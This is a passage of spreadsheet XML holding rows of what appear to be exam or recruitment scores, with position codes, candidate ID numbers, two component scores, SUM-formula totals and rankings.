      <c r="H135" s="8" t="n">
        <f aca="false">SUM(E135:G135)</f>
        <v>119.2</v>
      </c>
      <c r="I135" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="136" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A136" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B136" s="8" t="n">
        <v>1314010111</v>
      </c>
      <c r="C136" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D136" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E136" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F136" s="8" t="n">
        <v>55.5</v>
      </c>
      <c r="G136" s="8"/>
      <c r="H136" s="8" t="n">
        <f aca="false">SUM(E136:G136)</f>
        <v>114.9</v>
      </c>
      <c r="I136" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="137" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A137" s="8" t="n">
        <v>4101017</v>
      </c>
      <c r="B137" s="8" t="n">
        <v>1314010113</v>
      </c>
      <c r="C137" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D137" s="8" t="s">
        <v>107</v>
      </c>
      <c r="E137" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F137" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G137" s="8"/>
      <c r="H137" s="8" t="n">
        <f aca="false">SUM(E137:G137)</f>
        <v>107.4</v>
      </c>
      <c r="I137" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="138" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A138" s="8" t="n">
        <v>4102002</v>
      </c>
      <c r="B138" s="8" t="n">
        <v>1314010303</v>
      </c>
      <c r="C138" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D138" s="8" t="s">
        <v>108</v>
      </c>
      <c r="E138" s="8" t="n">
        <v>64.6</v>
      </c>
      <c r="F138" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G138" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H138" s="8" t="n">
        <f aca="false">SUM(E138:G138)</f>
        <v>135.6</v>
      </c>
      <c r="I138" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="139" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A139" s="8" t="n">
        <v>4102002</v>
      </c>
      <c r="B139" s="8" t="n">
        <v>1314010301</v>
      </c>
      <c r="C139" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D139" s="8" t="s">
        <v>108</v>
      </c>
      <c r="E139" s="8" t="n">
        <v>67.6</v>
      </c>
      <c r="F139" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G139" s="8"/>
      <c r="H139" s="8" t="n">
        <f aca="false">SUM(E139:G139)</f>
        <v>125.6</v>
      </c>
      <c r="I139" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="140" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A140" s="8" t="n">
        <v>4102002</v>
      </c>
      <c r="B140" s="8" t="n">
        <v>1314010302</v>
      </c>
      <c r="C140" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D140" s="8" t="s">
        <v>108</v>
      </c>
      <c r="E140" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F140" s="8" t="n">
        <v>46</v>
      </c>
      <c r="G140" s="8"/>
      <c r="H140" s="8" t="n">
        <f aca="false">SUM(E140:G140)</f>
        <v>108.8</v>
      </c>
      <c r="I140" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="141" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A141" s="8" t="n">
        <v>4102018</v>
      </c>
      <c r="B141" s="8" t="n">
        <v>1314010304</v>
      </c>
      <c r="C141" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D141" s="8" t="s">
        <v>108</v>
      </c>
      <c r="E141" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="F141" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G141" s="8"/>
      <c r="H141" s="8" t="n">
        <f aca="false">SUM(E141:G141)</f>
        <v>106.2</v>
      </c>
      <c r="I141" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="142" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A142" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B142" s="8" t="n">
        <v>1314010203</v>
      </c>
      <c r="C142" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D142" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E142" s="8" t="n">
        <v>73.2</v>
      </c>
      <c r="F142" s="8" t="n">
        <v>85</v>
      </c>
      <c r="G142" s="8"/>
      <c r="H142" s="8" t="n">
        <f aca="false">SUM(E142:G142)</f>
        <v>158.2</v>
      </c>
      <c r="I142" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="143" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A143" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B143" s="8" t="n">
        <v>1314010201</v>
      </c>
      <c r="C143" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D143" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E143" s="8" t="n">
        <v>60.4</v>
      </c>
      <c r="F143" s="8" t="n">
        <v>81</v>
      </c>
      <c r="G143" s="8"/>
      <c r="H143" s="8" t="n">
        <f aca="false">SUM(E143:G143)</f>
        <v>141.4</v>
      </c>
      <c r="I143" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="144" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A144" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B144" s="8" t="n">
        <v>1314010205</v>
      </c>
      <c r="C144" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D144" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E144" s="8" t="n">
        <v>54.8</v>
      </c>
      <c r="F144" s="8" t="n">
        <v>81</v>
      </c>
      <c r="G144" s="8"/>
      <c r="H144" s="8" t="n">
        <f aca="false">SUM(E144:G144)</f>
        <v>135.8</v>
      </c>
      <c r="I144" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="145" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A145" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B145" s="8" t="n">
        <v>1314010202</v>
      </c>
      <c r="C145" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D145" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E145" s="8" t="n">
        <v>66</v>
      </c>
      <c r="F145" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G145" s="8"/>
      <c r="H145" s="8" t="n">
        <f aca="false">SUM(E145:G145)</f>
        <v>130</v>
      </c>
      <c r="I145" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="146" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A146" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B146" s="8" t="n">
        <v>1314010207</v>
      </c>
      <c r="C146" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D146" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E146" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F146" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G146" s="8"/>
      <c r="H146" s="8" t="n">
        <f aca="false">SUM(E146:G146)</f>
        <v>127.6</v>
      </c>
      <c r="I146" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="147" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A147" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B147" s="8" t="n">
        <v>1314010204</v>
      </c>
      <c r="C147" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D147" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E147" s="8" t="n">
        <v>59.4</v>
      </c>
      <c r="F147" s="8" t="n">
        <v>66</v>
      </c>
      <c r="G147" s="8"/>
      <c r="H147" s="8" t="n">
        <f aca="false">SUM(E147:G147)</f>
        <v>125.4</v>
      </c>
      <c r="I147" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="148" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A148" s="8" t="n">
        <v>4103019</v>
      </c>
      <c r="B148" s="8" t="n">
        <v>1314010206</v>
      </c>
      <c r="C148" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D148" s="8" t="s">
        <v>109</v>
      </c>
      <c r="E148" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="F148" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G148" s="8"/>
      <c r="H148" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="I148" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="149" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A149" s="8" t="n">
        <v>4104022</v>
      </c>
      <c r="B149" s="8" t="n">
        <v>1314010209</v>
      </c>
      <c r="C149" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D149" s="8" t="s">
        <v>110</v>
      </c>
      <c r="E149" s="8" t="n">
        <v>54.6</v>
      </c>
      <c r="F149" s="8" t="n">
        <v>40</v>
      </c>
      <c r="G149" s="8"/>
      <c r="H149" s="8" t="n">
        <f aca="false">SUM(E149:G149)</f>
        <v>94.6</v>
      </c>
      <c r="I149" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="150" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A150" s="8" t="n">
        <v>4104022</v>
      </c>
      <c r="B150" s="8" t="n">
        <v>1314010208</v>
      </c>
      <c r="C150" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D150" s="8" t="s">
        <v>110</v>
      </c>
      <c r="E150" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F150" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G150" s="8"/>
      <c r="H150" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I150" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="151" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A151" s="8" t="n">
        <v>4105004</v>
      </c>
      <c r="B151" s="8" t="n">
        <v>1314010116</v>
      </c>
      <c r="C151" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D151" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E151" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="F151" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G151" s="8"/>
      <c r="H151" s="8" t="n">
        <f aca="false">SUM(E151:G151)</f>
        <v>118.2</v>
      </c>
      <c r="I151" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="152" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A152" s="8" t="n">
        <v>4105004</v>
      </c>
      <c r="B152" s="8" t="n">
        <v>1314010115</v>
      </c>
      <c r="C152" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D152" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E152" s="8" t="n">
        <v>52.8</v>
      </c>
      <c r="F152" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G152" s="8"/>
      <c r="H152" s="8" t="n">
        <f aca="false">SUM(E152:G152)</f>
        <v>110.8</v>
      </c>
      <c r="I152" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="153" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A153" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B153" s="8" t="n">
        <v>1314010127</v>
      </c>
      <c r="C153" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D153" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E153" s="8" t="n">
        <v>72.2</v>
      </c>
      <c r="F153" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G153" s="8"/>
      <c r="H153" s="8" t="n">
        <f aca="false">SUM(E153:G153)</f>
        <v>136.2</v>
      </c>
      <c r="I153" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="154" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A154" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B154" s="8" t="n">
        <v>1314010120</v>
      </c>
      <c r="C154" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D154" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E154" s="8" t="n">
        <v>77.8</v>
      </c>
      <c r="F154" s="8" t="n">
        <v>58</v>
      </c>
      <c r="G154" s="8"/>
      <c r="H154" s="8" t="n">
        <f aca="false">SUM(E154:G154)</f>
        <v>135.8</v>
      </c>
      <c r="I154" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="155" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A155" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B155" s="8" t="n">
        <v>1314010125</v>
      </c>
      <c r="C155" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D155" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E155" s="8" t="n">
        <v>71.8</v>
      </c>
      <c r="F155" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G155" s="8"/>
      <c r="H155" s="8" t="n">
        <f aca="false">SUM(E155:G155)</f>
        <v>130.8</v>
      </c>
      <c r="I155" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="156" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A156" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B156" s="8" t="n">
        <v>1314010126</v>
      </c>
      <c r="C156" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D156" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E156" s="8" t="n">
        <v>61</v>
      </c>
      <c r="F156" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G156" s="8"/>
      <c r="H156" s="8" t="n">
        <f aca="false">SUM(E156:G156)</f>
        <v>126</v>
      </c>
      <c r="I156" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="157" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A157" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B157" s="8" t="n">
        <v>1314010119</v>
      </c>
      <c r="C157" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D157" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E157" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="F157" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G157" s="8"/>
      <c r="H157" s="8" t="n">
        <f aca="false">SUM(E157:G157)</f>
        <v>119.6</v>
      </c>
      <c r="I157" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="158" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A158" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B158" s="8" t="n">
        <v>1314010123</v>
      </c>
      <c r="C158" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D158" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E158" s="8" t="n">
        <v>53</v>
      </c>
      <c r="F158" s="8" t="n">
        <v>64</v>
      </c>
      <c r="G158" s="8"/>
      <c r="H158" s="8" t="n">
        <f aca="false">SUM(E158:G158)</f>
        <v>117</v>
      </c>
      <c r="I158" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="159" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A159" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B159" s="8" t="n">
        <v>1314010118</v>
      </c>
      <c r="C159" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D159" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E159" s="8" t="n">
        <v>56.2</v>
      </c>
      <c r="F159" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G159" s="8"/>
      <c r="H159" s="8" t="n">
        <f aca="false">SUM(E159:G159)</f>
        <v>115.2</v>
      </c>
      <c r="I159" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="160" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A160" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B160" s="8" t="n">
        <v>1314010124</v>
      </c>
      <c r="C160" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D160" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E160" s="8" t="n">
        <v>61</v>
      </c>
      <c r="F160" s="8" t="n">
        <v>47</v>
      </c>
      <c r="G160" s="8"/>
      <c r="H160" s="8" t="n">
        <f aca="false">SUM(E160:G160)</f>
        <v>108</v>
      </c>
      <c r="I160" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="161" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A161" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B161" s="8" t="n">
        <v>1314010122</v>
      </c>
      <c r="C161" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D161" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E161" s="8" t="n">
        <v>61</v>
      </c>
      <c r="F161" s="8" t="n">
        <v>35</v>
      </c>
      <c r="G161" s="8"/>
      <c r="H161" s="8" t="n">
        <f aca="false">SUM(E161:G161)</f>
        <v>96</v>
      </c>
      <c r="I161" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="162" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A162" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B162" s="8" t="n">
        <v>1314010121</v>
      </c>
      <c r="C162" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D162" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E162" s="8" t="n">
        <v>60.8</v>
      </c>
      <c r="F162" s="8" t="n">
        <v>26</v>
      </c>
      <c r="G162" s="8"/>
      <c r="H162" s="8" t="n">
        <f aca="false">SUM(E162:G162)</f>
        <v>86.8</v>
      </c>
      <c r="I162" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="163" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A163" s="8" t="n">
        <v>4105021</v>
      </c>
      <c r="B163" s="8" t="n">
        <v>1314010117</v>
      </c>
      <c r="C163" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D163" s="8" t="s">
        <v>111</v>
      </c>
      <c r="E163" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F163" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G163" s="8"/>
      <c r="H163" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I163" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="164" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A164" s="8" t="n">
        <v>4106023</v>
      </c>
      <c r="B164" s="8" t="n">
        <v>1314010128</v>
      </c>
      <c r="C164" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D164" s="8" t="s">
        <v>112</v>
      </c>
      <c r="E164" s="8" t="n">
        <v>58.4</v>
      </c>
      <c r="F164" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G164" s="8"/>
      <c r="H164" s="8" t="n">
        <f aca="false">SUM(E164:G164)</f>
        <v>125.4</v>
      </c>
      <c r="I164" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="165" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A165" s="8" t="n">
        <v>4106023</v>
      </c>
      <c r="B165" s="8" t="n">
        <v>1314010130</v>
      </c>
      <c r="C165" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D165" s="8" t="s">
        <v>112</v>
      </c>
      <c r="E165" s="8" t="n">
        <v>55.6</v>
      </c>
      <c r="F165" s="8" t="n">
        <v>68</v>
      </c>
      <c r="G165" s="8"/>
      <c r="H165" s="8" t="n">
        <f aca="false">SUM(E165:G165)</f>
        <v>123.6</v>
      </c>
      <c r="I165" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="166" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A166" s="8" t="n">
        <v>4106023</v>
      </c>
      <c r="B166" s="8" t="n">
        <v>1314010129</v>
      </c>
      <c r="C166" s="8" t="s">
        <v>90</v>
      </c>
      <c r="D166" s="8" t="s">
        <v>112</v>
      </c>
      <c r="E166" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="F166" s="8" t="n">
        <v>57</v>
      </c>
      <c r="G166" s="8"/>
      <c r="H166" s="8" t="n">
        <f aca="false">SUM(E166:G166)</f>
        <v>122.8</v>
      </c>
      <c r="I166" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="167" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A167" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B167" s="8" t="n">
        <v>1314010212</v>
      </c>
      <c r="C167" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D167" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E167" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="F167" s="8" t="n">
        <v>72</v>
      </c>
      <c r="G167" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H167" s="8" t="n">
        <f aca="false">SUM(E167:G167)</f>
        <v>141.6</v>
      </c>
      <c r="I167" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="168" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A168" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B168" s="8" t="n">
        <v>1314010213</v>
      </c>
      <c r="C168" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D168" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E168" s="8" t="n">
        <v>75.4</v>
      </c>
      <c r="F168" s="8" t="n">
        <v>59</v>
      </c>
      <c r="G168" s="8"/>
      <c r="H168" s="8" t="n">
        <f aca="false">SUM(E168:G168)</f>
        <v>134.4</v>
      </c>
      <c r="I168" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="169" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A169" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B169" s="8" t="n">
        <v>1314010210</v>
      </c>
      <c r="C169" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D169" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E169" s="8" t="n">
        <v>55</v>
      </c>
      <c r="F169" s="8" t="n">
        <v>55</v>
      </c>
      <c r="G169" s="8"/>
      <c r="H169" s="8" t="n">
        <f aca="false">SUM(E169:G169)</f>
        <v>110</v>
      </c>
      <c r="I169" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="170" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A170" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B170" s="8" t="n">
        <v>1314010215</v>
      </c>
      <c r="C170" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D170" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E170" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F170" s="8" t="n">
        <v>43</v>
      </c>
      <c r="G170" s="8"/>
      <c r="H170" s="8" t="n">
        <f aca="false">SUM(E170:G170)</f>
        <v>101.2</v>
      </c>
      <c r="I170" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="171" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A171" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B171" s="8" t="n">
        <v>1314010211</v>
      </c>
      <c r="C171" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D171" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E171" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F171" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G171" s="8"/>
      <c r="H171" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I171" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="172" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A172" s="8" t="n">
        <v>4107003</v>
      </c>
      <c r="B172" s="8" t="n">
        <v>1314010214</v>
      </c>
      <c r="C172" s="8" t="s">
        <v>84</v>
      </c>
      <c r="D172" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E172" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F172" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G172" s="8"/>
      <c r="H172" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I172" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="173" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A173" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B173" s="8" t="n">
        <v>1314010217</v>
      </c>
      <c r="C173" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D173" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E173" s="8" t="n">
        <v>69</v>
      </c>
      <c r="F173" s="8" t="n">
        <v>67</v>
      </c>
      <c r="G173" s="8"/>
      <c r="H173" s="8" t="n">
        <f aca="false">SUM(E173:G173)</f>
        <v>136</v>
      </c>
      <c r="I173" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="174" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A174" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B174" s="8" t="n">
        <v>1314010220</v>
      </c>
      <c r="C174" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D174" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E174" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="F174" s="8" t="n">
        <v>65</v>
      </c>
      <c r="G174" s="8"/>
      <c r="H174" s="8" t="n">
        <f aca="false">SUM(E174:G174)</f>
        <v>128.2</v>
      </c>
      <c r="I174" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="175" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A175" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B175" s="8" t="n">
        <v>1314010222</v>
      </c>
      <c r="C175" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D175" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E175" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="F175" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G175" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H175" s="8" t="n">
        <f aca="false">SUM(E175:G175)</f>
        <v>125.8</v>
      </c>
      <c r="I175" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="176" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A176" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B176" s="8" t="n">
        <v>1314010216</v>
      </c>
      <c r="C176" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D176" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E176" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="F176" s="8" t="n">
        <v>52</v>
      </c>
      <c r="G176" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H176" s="8" t="n">
        <f aca="false">SUM(E176:G176)</f>
        <v>119.8</v>
      </c>
      <c r="I176" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="177" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A177" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B177" s="8" t="n">
        <v>1314010218</v>
      </c>
      <c r="C177" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D177" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E177" s="8" t="n">
        <v>64.8</v>
      </c>
      <c r="F177" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G177" s="8"/>
      <c r="H177" s="8" t="n">
        <f aca="false">SUM(E177:G177)</f>
        <v>118.8</v>
      </c>
      <c r="I177" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="178" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A178" s="8" t="n">
        <v>4107010</v>
      </c>
      <c r="B178" s="8" t="n">
        <v>1314010223</v>
      </c>
      <c r="C178" s="8" t="s">
        <v>86</v>
      </c>
      <c r="D178" s="8" t="s">
        <v>113</v>
      </c>
      <c r="E178" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F178" s="8" t="n">
        <v>49</v>
      </c>
      <c r="G178" s="8" t="n">
        <v>3</v>
      </c>
